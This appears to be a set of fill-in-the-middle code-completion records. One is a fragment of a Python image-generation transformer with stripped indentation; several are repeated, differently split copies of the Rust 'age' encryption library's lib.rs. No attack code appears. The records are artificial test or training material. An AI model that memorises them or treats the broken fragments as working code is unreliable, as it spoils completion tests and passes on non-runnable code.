offset = cache['offset']
assert offset >= text_len, "cached inference for text is not supported"
q = cache[cache_key]
assert isinstance(q, deque) and len(q) == image_size
x_top, x_left, *x_pass = x[:, -1].chunk(4, dim=-1)
q.append((x_top, x_left))
x_top = q.popleft()[0]
x_left = q[-2][1]
if (offset - text_len) % image_size == 0:
x_left = torch.zeros_like(x_left)
x = torch.cat((x_top, x_left, *x_pass), dim=-1)
return self.fn(x[:, None], cache=cache, **kwargs)
n = x.shape[1]
padding = seq_len - n + 1
# if sequence is shorter than the text length, no image tokens to shift
if n < text_len:
return self.fn(x, **kwargs)
# get text and image tokens
x_text, x_img = x[:, :text_len], x[:, text_len:]
x_img = F.pad(x_img, (0, 0, 0, padding))
x_img = rearrange(x_img, 'b (h w) d -> b h w d', h = image_size)
# shift 1 from the left for text tokens
x_text_shift, x_text_pass = x_text.chunk(2, dim = -1)
x_text_shift = F.pad(x_text_shift, (0, 0, 1, -1))
x_text = torch.cat((x_text_shift, x_text_pass), dim = -1)
# shift from top, left for image tokens
x_img_shift_top, x_img_shift_left, *x_img_pass = x_img.chunk(4, dim = -1)
x_img_shift_left = F.pad(x_img_shift_left, (0, 0, 1, -1))
x_img_shift_top = F.pad(x_img_shift_top, (0, 0, 0, 0, 1, -1))
x_img = torch.cat((x_img_shift_top, x_img_shift_left, *x_img_pass), dim = -1)
# merge text and image sequence back together
x_img = rearrange(x_img, 'b h w d -> b (h w) d')
x_img = x_img[:, :-padding]
x = torch.cat((x_text, x_img), dim = 1)
if exists(cache):
dummy_top, dummy_left, *_ = x[:, -1].chunk(4, dim=-1)
dummy_top, dummy_left = torch.zeros_like(dummy_top), torch.zeros_like(dummy_left)
q = deque()
x_img = x_img[:, -image_size:]
for _ in range(image_size - x_img.shape[1]):
q.append((dummy_top, dummy_left))
for i in range(x_img.shape[1]):
q.append(x_img[:, i].chunk(4, dim=-1)[:2])
cache[cache_key] = q
return self.fn(x, cache=cache, **kwargs)
# main transformer class
class Transformer(nn.Module):
def __init__(
self,
*,
dim,
depth,
seq_len,
reversible = False,
causal = True,
heads = 8,
dim_head = 64,
ff_mult = 4,
attn_dropout = 0.,
ff_dropout = 0.,
attn_types = None,
image_fmap_size = None,
sparse_attn = False,
stable = False,
sandwich_norm = False,
shift_tokens = False,
rotary_emb = True,
shared_attn_ids = None,
shared_ff_ids = None,
        optimize_for_inference = False,  # use cache-friendly masked attention instead of a sparse one
):
super().__init__()
layers = nn.ModuleList([])
sparse_layer = cast_tuple(sparse_attn, depth)
self.seq_len = seq_len
self.image_fmap_size = image_fmap_size
attn_types = default(attn_types, ('full',))
attn_types = cast_tuple(attn_types)
attn_type_layer = islice(cycle(attn_types), depth)
shared_attn_ids = cycle(default(shared_attn_ids, range(depth)))
shared_ff_ids = cycle(default(shared_ff_ids, range(depth)))
shared_attn_layers = {}
shared_ff_layers = {}
for (ind, sparse_attn, attn_type, attn_id, ff_id) in \
zip(range(depth), sparse_layer, attn_type_layer, shared_attn_ids, shared_ff_ids):
if attn_type == 'full':
attn_class = partial(Attention, stable = stable)
elif attn_type == 'sparse':
attn_class = SparseAttention
elif attn_type == 'axial_row':
if optimize_for_inference:
attn_class = partial(Attention, stable = stable, static_mask = self._get_attention_mask(attn_type))
else:
attn_class = partial(SparseAxialCausalAttention, seq_len = seq_len, axis = 0, image_size = image_fmap_size, stable = stable)
elif attn_type == 'axial_col':
if optimize_for_inference:
attn_class = partial(Attention, stable = stable, static_mask = self._get_attention_mask(attn_type))
else:
attn_class = partial(SparseAxialCausalAttention, seq_len = seq_len, axis = 1, image_size = image_fmap_size, stable = stable)
elif attn_type == 'conv_like':
attn_class = partial(SparseConvCausalAttention, seq_len = seq_len, image_size = image_fmap_size, stable = stable)
else:
raise ValueError(f'attention type "{attn_type}" is not valid')
attn, reused_attn_type = shared_attn_layers.get(attn_id, (None, None))
if not exists(attn):
attn = attn_class(dim, causal = causal, seq_len = seq_len, heads = heads, dim_head = dim_head, dropout = attn_dropout)
shared_attn_layers[attn_id] = (attn, attn_type)
elif attn_type != reused_attn_type:
raise ValueError('attn_types do not match shared_attn_ids '
f'(ind = {ind}, attn_type = "{attn_type}", reused_attn_type = "{reused_attn_type}")')
ff = shared_ff_layers.get(ff_id)
if not exists(ff):
ff = FeedForward(dim, mult = ff_mult, dropout = ff_dropout)
shared_ff_layers[ff_id] = ff
if isinstance(attn, Attention):
attn = CachedAs(f'attn_{ind}', attn)
else:
# at the moment, other attention classes don't support cache
attn = NonCached(attn)
if shift_tokens:
attn = CachedAs(f'preshift_attn_{ind}', PreShiftToken(attn, image_size = image_fmap_size, seq_len = seq_len))
ff = CachedAs(f'preshift_ff_{ind}', PreShiftToken(ff, image_size = image_fmap_size, seq_len = seq_len))
layers.append(nn.ModuleList([
LayerScale(dim, ind + 1, PreNorm(dim, attn, sandwich = sandwich_norm)),
LayerScale(dim, ind + 1, PreNorm(dim, ff, sandwich = sandwich_norm))
]))
execute_type = ReversibleSequence if reversible else SequentialSequence
route_attn = ((True, False),) * depth
route_all = ((True, True),) * depth
attn_route_map = {'mask': route_attn, 'rotary_pos_emb': route_attn,
'cache': route_all}
self.layers = execute_type(layers, args_route = attn_route_map)
# generate positional embeddings for rotary
pos_emb = None
if rotary_emb:
rot_dim = dim_head // 3
img_seq_len = (image_fmap_size ** 2)
text_len = seq_len - img_seq_len + 1
text_pos_emb = RotaryEmbedding(dim = rot_dim)
img_axial_pos_emb = RotaryEmbedding(dim = rot_dim, freqs_for = 'pixel')
text_freqs = text_pos_emb(torch.arange(text_len))
img_to_text_freqs = text_pos_emb(torch.full((img_seq_len,), 8192)) # image is given a position far away from text
text_freqs = torch.cat((text_freqs, img_to_text_freqs), dim = 0)
img_freqs_axial = img_axial_pos_emb(torch.linspace(-1, 1, steps = image_fmap_size))
img_freqs = broadcat((rearrange(img_freqs_axial, 'i d -> i () d'), rearrange(img_freqs_axial, 'j d -> () j d')), dim = -1)
img_freqs = rearrange(img_freqs, 'h w d -> (h w) d')
            text_axial_freqs = img_axial_pos_emb(torch.full((text_len,), -10.))  # text is given a position of -10, far apart from the image axial positions, which lie in the range [-1, 1]
text_axial_freqs = torch.cat((text_axial_freqs, text_axial_freqs), dim = -1)
img_freqs = torch.cat((text_axial_freqs, img_freqs), dim = 0)
pos_emb = torch.cat((text_freqs, img_freqs), dim = -1)
pos_emb = rearrange(pos_emb, 'n d -> () n d')
self.register_buffer('pos_emb', pos_emb)
def forward(self, x, **kwargs):
return self.layers(x, rotary_pos_emb = self.pos_emb, **kwargs)
def _get_attention_mask(self, attn_type):
img_seq_len = self.image_fmap_size ** 2
text_len = self.seq_len + 1 - img_seq_len
static_mask = torch.zeros(self.seq_len, self.seq_len, dtype=torch.bool)
static_mask[:, :text_len] = True
if attn_type == 'axial_row':
for row in range(self.image_fmap_size):
begin = text_len + row * self.image_fmap_size
end = text_len + (row + 1) * self.image_fmap_size
static_mask[begin:end, begin:end] = True
elif attn_type == 'axial_col':
for col in range(self.image_fmap_size):
begin = text_len + col
static_mask[begin::self.image_fmap_size, begin::self.image_fmap_size] = True
else:
raise ValueError(f'attention type "{attn_type}" can\'t be simulated with a static mask')
return static_mask |
def forward(self, x, *, cache=None, **kwargs):
return self.fn(x, cache=cache, cache_key=self.cache_key, **kwargs) | random_line_split |
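The `random_line_split` target above completes `CachedAs.forward`, which simply forwards calls under a fixed `cache_key`. The sketch below (not from the original file; all names are made up) shows the cache contract that `NonCached` relies on: a plain dict threaded through `forward`, with each wrapper reading and extending its own entry so that one-token incremental steps still see the full sequence.

# --- illustrative sketch: the inference-cache contract (assumed toy layer) ---
import torch
from torch import nn

class Echo(nn.Module):
    # stand-in for an attention/feed-forward layer; just returns its input
    def forward(self, x, cache=None, cache_key=None):
        return x

class ToyNonCached(nn.Module):
    # same idea as NonCached above: rebuild the full sequence, run fn, keep the suffix
    def __init__(self, fn):
        super().__init__()
        self.fn = fn

    def forward(self, x, *, cache=None, cache_key=None, **kwargs):
        n = x.shape[-2]
        if cache is not None:
            if cache_key in cache:
                x = torch.cat([cache[cache_key], x], dim=-2)
            cache[cache_key] = x
        return self.fn(x, **kwargs)[:, -n:]

layer = ToyNonCached(Echo())
cache = {}
first = layer(torch.randn(1, 3, 4), cache=cache, cache_key='demo')   # prime with 3 tokens
step = layer(torch.randn(1, 1, 4), cache=cache, cache_key='demo')    # one incremental token
print(step.shape, cache['demo'].shape)  # torch.Size([1, 1, 4]) torch.Size([1, 4, 4])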
lib.rs | //! *Library for encrypting and decrypting age files*
//!
//! This crate implements file encryption according to the [age-encryption.org/v1]
//! specification. It generates and consumes encrypted files that are compatible with the
//! [rage] CLI tool, as well as the reference [Go] implementation.
//!
//! The encryption and decryption APIs are provided by [`Encryptor`] and [`Decryptor`].
//! There are several ways to use these:
//! - For most cases (including programmatic usage), use [`Encryptor::with_recipients`]
//! with [`x25519::Recipient`], and [`Decryptor`] with [`x25519::Identity`].
//! - APIs are available for passphrase-based encryption and decryption. These should
//! only be used with passphrases that were provided by (or generated for) a human.
//! - For compatibility with existing SSH keys, enable the `ssh` feature flag, and use
//! [`ssh::Recipient`] and [`ssh::Identity`].
//!
//! Age-encrypted files are binary and non-malleable. To encode them as text, use the
//! wrapping readers and writers in the [`armor`] module, behind the `armor` feature flag.
//!
//! *Caution*: all crate versions prior to 1.0 are beta releases for **testing purposes
//! only**.
//!
//! [age-encryption.org/v1]: https://age-encryption.org/v1
//! [rage]: https://crates.io/crates/rage
//! [Go]: https://filippo.io/age
//!
//! # Examples
//!
//! ## Recipient-based encryption
//!
//! ```
//! use std::io::{Read, Write};
//! use std::iter;
//!
//! # fn run_main() -> Result<(), ()> {
//! let key = age::x25519::Identity::generate();
//! let pubkey = key.to_public();
//!
//! let plaintext = b"Hello world!";
//!
//! // Encrypt the plaintext to a ciphertext...
//! # fn encrypt(pubkey: age::x25519::Recipient, plaintext: &[u8]) -> Result<Vec<u8>, age::EncryptError> {
//! let encrypted = {
//! let encryptor = age::Encryptor::with_recipients(vec![Box::new(pubkey)])
//! .expect("we provided a recipient");
//!
//! let mut encrypted = vec![];
//! let mut writer = encryptor.wrap_output(&mut encrypted)?;
//! writer.write_all(plaintext)?;
//! writer.finish()?;
//!
//! encrypted
//! };
//! # Ok(encrypted)
//! # }
//!
//! // ... and decrypt the obtained ciphertext to the plaintext again.
//! # fn decrypt(key: age::x25519::Identity, encrypted: Vec<u8>) -> Result<Vec<u8>, age::DecryptError> {
//! let decrypted = {
//! let decryptor = match age::Decryptor::new(&encrypted[..])? {
//! age::Decryptor::Recipients(d) => d,
//! _ => unreachable!(),
//! };
//!
//! let mut decrypted = vec![];
//! let mut reader = decryptor.decrypt(iter::once(&key as &dyn age::Identity))?;
//! reader.read_to_end(&mut decrypted);
//!
//! decrypted
//! };
//! # Ok(decrypted)
//! # }
//! # let decrypted = decrypt(
//! # key,
//! # encrypt(pubkey, &plaintext[..]).map_err(|_| ())?
//! # ).map_err(|_| ())?;
//!
//! assert_eq!(decrypted, plaintext);
//! # Ok(())
//! # }
//!
//! # run_main().unwrap();
//! ```
//!
//! ## Passphrase-based encryption
//!
//! ```
//! use age::secrecy::Secret;
//! use std::io::{Read, Write};
//!
//! # fn run_main() -> Result<(), ()> { | //! let passphrase = "this is not a good passphrase";
//!
//! // Encrypt the plaintext to a ciphertext using the passphrase...
//! # fn encrypt(passphrase: &str, plaintext: &[u8]) -> Result<Vec<u8>, age::EncryptError> {
//! let encrypted = {
//! let encryptor = age::Encryptor::with_user_passphrase(Secret::new(passphrase.to_owned()));
//!
//! let mut encrypted = vec![];
//! let mut writer = encryptor.wrap_output(&mut encrypted)?;
//! writer.write_all(plaintext)?;
//! writer.finish()?;
//!
//! encrypted
//! };
//! # Ok(encrypted)
//! # }
//!
//! // ... and decrypt the ciphertext to the plaintext again using the same passphrase.
//! # fn decrypt(passphrase: &str, encrypted: Vec<u8>) -> Result<Vec<u8>, age::DecryptError> {
//! let decrypted = {
//! let decryptor = match age::Decryptor::new(&encrypted[..])? {
//! age::Decryptor::Passphrase(d) => d,
//! _ => unreachable!(),
//! };
//!
//! let mut decrypted = vec![];
//! let mut reader = decryptor.decrypt(&Secret::new(passphrase.to_owned()), None)?;
//! reader.read_to_end(&mut decrypted);
//!
//! decrypted
//! };
//! # Ok(decrypted)
//! # }
//! # let decrypted = decrypt(
//! # passphrase,
//! # encrypt(passphrase, &plaintext[..]).map_err(|_| ())?
//! # ).map_err(|_| ())?;
//!
//! assert_eq!(decrypted, plaintext);
//! # Ok(())
//! # }
//! # run_main().unwrap();
//! ```
#![cfg_attr(docsrs, feature(doc_cfg))]
#![forbid(unsafe_code)]
// Catch documentation errors caused by code changes.
#![deny(rustdoc::broken_intra_doc_links)]
#![deny(missing_docs)]
// Re-export crates that are used in our public API.
pub use age_core::secrecy;
mod error;
mod format;
mod identity;
mod keys;
mod primitives;
mod protocol;
mod util;
pub use error::{DecryptError, EncryptError};
pub use identity::{IdentityFile, IdentityFileEntry};
pub use primitives::stream;
pub use protocol::{decryptor, Decryptor, Encryptor};
#[cfg(feature = "armor")]
pub use primitives::armor;
#[cfg(feature = "cli-common")]
#[cfg_attr(docsrs, doc(cfg(feature = "cli-common")))]
pub mod cli_common;
mod i18n;
pub use i18n::localizer;
//
// Identity types
//
pub mod encrypted;
mod scrypt;
pub mod x25519;
#[cfg(feature = "plugin")]
#[cfg_attr(docsrs, doc(cfg(feature = "plugin")))]
pub mod plugin;
#[cfg(feature = "ssh")]
#[cfg_attr(docsrs, doc(cfg(feature = "ssh")))]
pub mod ssh;
use age_core::{
format::{FileKey, Stanza},
secrecy::SecretString,
};
/// A private key or other value that can unwrap an opaque file key from a recipient
/// stanza.
pub trait Identity {
/// Attempts to unwrap the given stanza with this identity.
///
/// This method is part of the `Identity` trait to expose age's [one joint] for
/// external implementations. You should not need to call this directly; instead, pass
/// identities to [`RecipientsDecryptor::decrypt`].
///
/// Returns:
/// - `Some(Ok(file_key))` on success.
/// - `Some(Err(e))` if a decryption error occurs.
/// - `None` if the recipient stanza does not match this key.
///
/// [one joint]: https://www.imperialviolet.org/2016/05/16/agility.html
/// [`RecipientsDecryptor::decrypt`]: protocol::decryptor::RecipientsDecryptor::decrypt
fn unwrap_stanza(&self, stanza: &Stanza) -> Option<Result<FileKey, DecryptError>>;
/// Attempts to unwrap any of the given stanzas, which are assumed to come from the
/// same age file header, and therefore contain the same file key.
///
/// This method is part of the `Identity` trait to expose age's [one joint] for
/// external implementations. You should not need to call this directly; instead, pass
/// identities to [`RecipientsDecryptor::decrypt`].
///
/// Returns:
/// - `Some(Ok(file_key))` on success.
/// - `Some(Err(e))` if a decryption error occurs.
/// - `None` if none of the recipient stanzas match this identity.
///
/// [one joint]: https://www.imperialviolet.org/2016/05/16/agility.html
/// [`RecipientsDecryptor::decrypt`]: protocol::decryptor::RecipientsDecryptor::decrypt
fn unwrap_stanzas(&self, stanzas: &[Stanza]) -> Option<Result<FileKey, DecryptError>> {
stanzas.iter().find_map(|stanza| self.unwrap_stanza(stanza))
}
}
/// A public key or other value that can wrap an opaque file key to a recipient stanza.
///
/// Implementations of this trait might represent more than one recipient.
pub trait Recipient {
/// Wraps the given file key, returning stanzas to be placed in an age file header.
///
/// Implementations MUST NOT return more than one stanza per "actual recipient".
///
/// This method is part of the `Recipient` trait to expose age's [one joint] for
/// external implementations. You should not need to call this directly; instead, pass
/// recipients to [`Encryptor::with_recipients`].
///
/// [one joint]: https://www.imperialviolet.org/2016/05/16/agility.html
fn wrap_file_key(&self, file_key: &FileKey) -> Result<Vec<Stanza>, EncryptError>;
}
/// Callbacks that might be triggered during encryption or decryption.
///
/// Structs that implement this trait should be given directly to the individual
/// `Recipient` or `Identity` implementations that require them.
pub trait Callbacks: Clone + Send + Sync + 'static {
/// Shows a message to the user.
///
/// This can be used to prompt the user to take some physical action, such as
/// inserting a hardware key.
fn display_message(&self, message: &str);
/// Requests that the user provides confirmation for some action.
///
/// This can be used to, for example, request that a hardware key the plugin wants to
/// try either be plugged in, or skipped.
///
/// - `message` is the request or call-to-action to be displayed to the user.
/// - `yes_string` and (optionally) `no_string` will be displayed on buttons or next
/// to selection options in the user's UI.
///
/// Returns:
/// - `Some(true)` if the user selected the option marked with `yes_string`.
/// - `Some(false)` if the user selected the option marked with `no_string` (or the
/// default negative confirmation label).
/// - `None` if the confirmation request could not be given to the user (for example,
/// if there is no UI for displaying messages).
fn confirm(&self, message: &str, yes_string: &str, no_string: Option<&str>) -> Option<bool>;
/// Requests non-private input from the user.
///
/// To request private inputs, use [`Callbacks::request_passphrase`].
fn request_public_string(&self, description: &str) -> Option<String>;
/// Requests a passphrase to decrypt a key.
fn request_passphrase(&self, description: &str) -> Option<SecretString>;
}
/// Helper for fuzzing the Header parser and serializer.
#[cfg(fuzzing)]
pub fn fuzz_header(data: &[u8]) {
if let Ok(header) = format::Header::read(data) {
let mut buf = Vec::with_capacity(data.len());
header.write(&mut buf).expect("can write header");
assert_eq!(&buf[..], &data[..buf.len()]);
}
} | //! let plaintext = b"Hello world!"; | random_line_split |
lib.rs | //! *Library for encrypting and decrypting age files*
//!
//! This crate implements file encryption according to the [age-encryption.org/v1]
//! specification. It generates and consumes encrypted files that are compatible with the
//! [rage] CLI tool, as well as the reference [Go] implementation.
//!
//! The encryption and decryption APIs are provided by [`Encryptor`] and [`Decryptor`].
//! There are several ways to use these:
//! - For most cases (including programmatic usage), use [`Encryptor::with_recipients`]
//! with [`x25519::Recipient`], and [`Decryptor`] with [`x25519::Identity`].
//! - APIs are available for passphrase-based encryption and decryption. These should
//! only be used with passphrases that were provided by (or generated for) a human.
//! - For compatibility with existing SSH keys, enable the `ssh` feature flag, and use
//! [`ssh::Recipient`] and [`ssh::Identity`].
//!
//! Age-encrypted files are binary and non-malleable. To encode them as text, use the
//! wrapping readers and writers in the [`armor`] module, behind the `armor` feature flag.
//!
//! *Caution*: all crate versions prior to 1.0 are beta releases for **testing purposes
//! only**.
//!
//! [age-encryption.org/v1]: https://age-encryption.org/v1
//! [rage]: https://crates.io/crates/rage
//! [Go]: https://filippo.io/age
//!
//! # Examples
//!
//! ## Recipient-based encryption
//!
//! ```
//! use std::io::{Read, Write};
//! use std::iter;
//!
//! # fn run_main() -> Result<(), ()> {
//! let key = age::x25519::Identity::generate();
//! let pubkey = key.to_public();
//!
//! let plaintext = b"Hello world!";
//!
//! // Encrypt the plaintext to a ciphertext...
//! # fn encrypt(pubkey: age::x25519::Recipient, plaintext: &[u8]) -> Result<Vec<u8>, age::EncryptError> {
//! let encrypted = {
//! let encryptor = age::Encryptor::with_recipients(vec![Box::new(pubkey)])
//! .expect("we provided a recipient");
//!
//! let mut encrypted = vec![];
//! let mut writer = encryptor.wrap_output(&mut encrypted)?;
//! writer.write_all(plaintext)?;
//! writer.finish()?;
//!
//! encrypted
//! };
//! # Ok(encrypted)
//! # }
//!
//! // ... and decrypt the obtained ciphertext to the plaintext again.
//! # fn decrypt(key: age::x25519::Identity, encrypted: Vec<u8>) -> Result<Vec<u8>, age::DecryptError> {
//! let decrypted = {
//! let decryptor = match age::Decryptor::new(&encrypted[..])? {
//! age::Decryptor::Recipients(d) => d,
//! _ => unreachable!(),
//! };
//!
//! let mut decrypted = vec![];
//! let mut reader = decryptor.decrypt(iter::once(&key as &dyn age::Identity))?;
//! reader.read_to_end(&mut decrypted);
//!
//! decrypted
//! };
//! # Ok(decrypted)
//! # }
//! # let decrypted = decrypt(
//! # key,
//! # encrypt(pubkey, &plaintext[..]).map_err(|_| ())?
//! # ).map_err(|_| ())?;
//!
//! assert_eq!(decrypted, plaintext);
//! # Ok(())
//! # }
//!
//! # run_main().unwrap();
//! ```
//!
//! ## Passphrase-based encryption
//!
//! ```
//! use age::secrecy::Secret;
//! use std::io::{Read, Write};
//!
//! # fn run_main() -> Result<(), ()> {
//! let plaintext = b"Hello world!";
//! let passphrase = "this is not a good passphrase";
//!
//! // Encrypt the plaintext to a ciphertext using the passphrase...
//! # fn encrypt(passphrase: &str, plaintext: &[u8]) -> Result<Vec<u8>, age::EncryptError> {
//! let encrypted = {
//! let encryptor = age::Encryptor::with_user_passphrase(Secret::new(passphrase.to_owned()));
//!
//! let mut encrypted = vec![];
//! let mut writer = encryptor.wrap_output(&mut encrypted)?;
//! writer.write_all(plaintext)?;
//! writer.finish()?;
//!
//! encrypted
//! };
//! # Ok(encrypted)
//! # }
//!
//! // ... and decrypt the ciphertext to the plaintext again using the same passphrase.
//! # fn decrypt(passphrase: &str, encrypted: Vec<u8>) -> Result<Vec<u8>, age::DecryptError> {
//! let decrypted = {
//! let decryptor = match age::Decryptor::new(&encrypted[..])? {
//! age::Decryptor::Passphrase(d) => d,
//! _ => unreachable!(),
//! };
//!
//! let mut decrypted = vec![];
//! let mut reader = decryptor.decrypt(&Secret::new(passphrase.to_owned()), None)?;
//! reader.read_to_end(&mut decrypted);
//!
//! decrypted
//! };
//! # Ok(decrypted)
//! # }
//! # let decrypted = decrypt(
//! # passphrase,
//! # encrypt(passphrase, &plaintext[..]).map_err(|_| ())?
//! # ).map_err(|_| ())?;
//!
//! assert_eq!(decrypted, plaintext);
//! # Ok(())
//! # }
//! # run_main().unwrap();
//! ```
#![cfg_attr(docsrs, feature(doc_cfg))]
#![forbid(unsafe_code)]
// Catch documentation errors caused by code changes.
#![deny(rustdoc::broken_intra_doc_links)]
#![deny(missing_docs)]
// Re-export crates that are used in our public API.
pub use age_core::secrecy;
mod error;
mod format;
mod identity;
mod keys;
mod primitives;
mod protocol;
mod util;
pub use error::{DecryptError, EncryptError};
pub use identity::{IdentityFile, IdentityFileEntry};
pub use primitives::stream;
pub use protocol::{decryptor, Decryptor, Encryptor};
#[cfg(feature = "armor")]
pub use primitives::armor;
#[cfg(feature = "cli-common")]
#[cfg_attr(docsrs, doc(cfg(feature = "cli-common")))]
pub mod cli_common;
mod i18n;
pub use i18n::localizer;
//
// Identity types
//
pub mod encrypted;
mod scrypt;
pub mod x25519;
#[cfg(feature = "plugin")]
#[cfg_attr(docsrs, doc(cfg(feature = "plugin")))]
pub mod plugin;
#[cfg(feature = "ssh")]
#[cfg_attr(docsrs, doc(cfg(feature = "ssh")))]
pub mod ssh;
use age_core::{
format::{FileKey, Stanza},
secrecy::SecretString,
};
/// A private key or other value that can unwrap an opaque file key from a recipient
/// stanza.
pub trait Identity {
/// Attempts to unwrap the given stanza with this identity.
///
/// This method is part of the `Identity` trait to expose age's [one joint] for
/// external implementations. You should not need to call this directly; instead, pass
/// identities to [`RecipientsDecryptor::decrypt`].
///
/// Returns:
/// - `Some(Ok(file_key))` on success.
/// - `Some(Err(e))` if a decryption error occurs.
/// - `None` if the recipient stanza does not match this key.
///
/// [one joint]: https://www.imperialviolet.org/2016/05/16/agility.html
/// [`RecipientsDecryptor::decrypt`]: protocol::decryptor::RecipientsDecryptor::decrypt
fn unwrap_stanza(&self, stanza: &Stanza) -> Option<Result<FileKey, DecryptError>>;
/// Attempts to unwrap any of the given stanzas, which are assumed to come from the
/// same age file header, and therefore contain the same file key.
///
/// This method is part of the `Identity` trait to expose age's [one joint] for
/// external implementations. You should not need to call this directly; instead, pass
/// identities to [`RecipientsDecryptor::decrypt`].
///
/// Returns:
/// - `Some(Ok(file_key))` on success.
/// - `Some(Err(e))` if a decryption error occurs.
/// - `None` if none of the recipient stanzas match this identity.
///
/// [one joint]: https://www.imperialviolet.org/2016/05/16/agility.html
/// [`RecipientsDecryptor::decrypt`]: protocol::decryptor::RecipientsDecryptor::decrypt
fn unwrap_stanzas(&self, stanzas: &[Stanza]) -> Option<Result<FileKey, DecryptError>> {
stanzas.iter().find_map(|stanza| self.unwrap_stanza(stanza))
}
}
/// A public key or other value that can wrap an opaque file key to a recipient stanza.
///
/// Implementations of this trait might represent more than one recipient.
pub trait Recipient {
/// Wraps the given file key, returning stanzas to be placed in an age file header.
///
/// Implementations MUST NOT return more than one stanza per "actual recipient".
///
/// This method is part of the `Recipient` trait to expose age's [one joint] for
/// external implementations. You should not need to call this directly; instead, pass
/// recipients to [`Encryptor::with_recipients`].
///
/// [one joint]: https://www.imperialviolet.org/2016/05/16/agility.html
fn wrap_file_key(&self, file_key: &FileKey) -> Result<Vec<Stanza>, EncryptError>;
}
/// Callbacks that might be triggered during encryption or decryption.
///
/// Structs that implement this trait should be given directly to the individual
/// `Recipient` or `Identity` implementations that require them.
pub trait Callbacks: Clone + Send + Sync + 'static {
/// Shows a message to the user.
///
/// This can be used to prompt the user to take some physical action, such as
/// inserting a hardware key.
fn display_message(&self, message: &str);
/// Requests that the user provides confirmation for some action.
///
/// This can be used to, for example, request that a hardware key the plugin wants to
/// try either be plugged in, or skipped.
///
/// - `message` is the request or call-to-action to be displayed to the user.
/// - `yes_string` and (optionally) `no_string` will be displayed on buttons or next
/// to selection options in the user's UI.
///
/// Returns:
/// - `Some(true)` if the user selected the option marked with `yes_string`.
/// - `Some(false)` if the user selected the option marked with `no_string` (or the
/// default negative confirmation label).
/// - `None` if the confirmation request could not be given to the user (for example,
/// if there is no UI for displaying messages).
fn confirm(&self, message: &str, yes_string: &str, no_string: Option<&str>) -> Option<bool>;
/// Requests non-private input from the user.
///
/// To request private inputs, use [`Callbacks::request_passphrase`].
fn request_public_string(&self, description: &str) -> Option<String>;
/// Requests a passphrase to decrypt a key.
fn request_passphrase(&self, description: &str) -> Option<SecretString>;
}
/// Helper for fuzzing the Header parser and serializer.
#[cfg(fuzzing)]
pub fn | (data: &[u8]) {
if let Ok(header) = format::Header::read(data) {
let mut buf = Vec::with_capacity(data.len());
header.write(&mut buf).expect("can write header");
assert_eq!(&buf[..], &data[..buf.len()]);
}
}
| fuzz_header | identifier_name |
lib.rs | //! *Library for encrypting and decrypting age files*
//!
//! This crate implements file encryption according to the [age-encryption.org/v1]
//! specification. It generates and consumes encrypted files that are compatible with the
//! [rage] CLI tool, as well as the reference [Go] implementation.
//!
//! The encryption and decryption APIs are provided by [`Encryptor`] and [`Decryptor`].
//! There are several ways to use these:
//! - For most cases (including programmatic usage), use [`Encryptor::with_recipients`]
//! with [`x25519::Recipient`], and [`Decryptor`] with [`x25519::Identity`].
//! - APIs are available for passphrase-based encryption and decryption. These should
//! only be used with passphrases that were provided by (or generated for) a human.
//! - For compatibility with existing SSH keys, enable the `ssh` feature flag, and use
//! [`ssh::Recipient`] and [`ssh::Identity`].
//!
//! Age-encrypted files are binary and non-malleable. To encode them as text, use the
//! wrapping readers and writers in the [`armor`] module, behind the `armor` feature flag.
//!
//! *Caution*: all crate versions prior to 1.0 are beta releases for **testing purposes
//! only**.
//!
//! [age-encryption.org/v1]: https://age-encryption.org/v1
//! [rage]: https://crates.io/crates/rage
//! [Go]: https://filippo.io/age
//!
//! # Examples
//!
//! ## Recipient-based encryption
//!
//! ```
//! use std::io::{Read, Write};
//! use std::iter;
//!
//! # fn run_main() -> Result<(), ()> {
//! let key = age::x25519::Identity::generate();
//! let pubkey = key.to_public();
//!
//! let plaintext = b"Hello world!";
//!
//! // Encrypt the plaintext to a ciphertext...
//! # fn encrypt(pubkey: age::x25519::Recipient, plaintext: &[u8]) -> Result<Vec<u8>, age::EncryptError> {
//! let encrypted = {
//! let encryptor = age::Encryptor::with_recipients(vec![Box::new(pubkey)])
//! .expect("we provided a recipient");
//!
//! let mut encrypted = vec![];
//! let mut writer = encryptor.wrap_output(&mut encrypted)?;
//! writer.write_all(plaintext)?;
//! writer.finish()?;
//!
//! encrypted
//! };
//! # Ok(encrypted)
//! # }
//!
//! // ... and decrypt the obtained ciphertext to the plaintext again.
//! # fn decrypt(key: age::x25519::Identity, encrypted: Vec<u8>) -> Result<Vec<u8>, age::DecryptError> {
//! let decrypted = {
//! let decryptor = match age::Decryptor::new(&encrypted[..])? {
//! age::Decryptor::Recipients(d) => d,
//! _ => unreachable!(),
//! };
//!
//! let mut decrypted = vec![];
//! let mut reader = decryptor.decrypt(iter::once(&key as &dyn age::Identity))?;
//! reader.read_to_end(&mut decrypted);
//!
//! decrypted
//! };
//! # Ok(decrypted)
//! # }
//! # let decrypted = decrypt(
//! # key,
//! # encrypt(pubkey, &plaintext[..]).map_err(|_| ())?
//! # ).map_err(|_| ())?;
//!
//! assert_eq!(decrypted, plaintext);
//! # Ok(())
//! # }
//!
//! # run_main().unwrap();
//! ```
//!
//! ## Passphrase-based encryption
//!
//! ```
//! use age::secrecy::Secret;
//! use std::io::{Read, Write};
//!
//! # fn run_main() -> Result<(), ()> {
//! let plaintext = b"Hello world!";
//! let passphrase = "this is not a good passphrase";
//!
//! // Encrypt the plaintext to a ciphertext using the passphrase...
//! # fn encrypt(passphrase: &str, plaintext: &[u8]) -> Result<Vec<u8>, age::EncryptError> {
//! let encrypted = {
//! let encryptor = age::Encryptor::with_user_passphrase(Secret::new(passphrase.to_owned()));
//!
//! let mut encrypted = vec![];
//! let mut writer = encryptor.wrap_output(&mut encrypted)?;
//! writer.write_all(plaintext)?;
//! writer.finish()?;
//!
//! encrypted
//! };
//! # Ok(encrypted)
//! # }
//!
//! // ... and decrypt the ciphertext to the plaintext again using the same passphrase.
//! # fn decrypt(passphrase: &str, encrypted: Vec<u8>) -> Result<Vec<u8>, age::DecryptError> {
//! let decrypted = {
//! let decryptor = match age::Decryptor::new(&encrypted[..])? {
//! age::Decryptor::Passphrase(d) => d,
//! _ => unreachable!(),
//! };
//!
//! let mut decrypted = vec![];
//! let mut reader = decryptor.decrypt(&Secret::new(passphrase.to_owned()), None)?;
//! reader.read_to_end(&mut decrypted)?;
//!
//! decrypted
//! };
//! # Ok(decrypted)
//! # }
//! # let decrypted = decrypt(
//! # passphrase,
//! # encrypt(passphrase, &plaintext[..]).map_err(|_| ())?
//! # ).map_err(|_| ())?;
//!
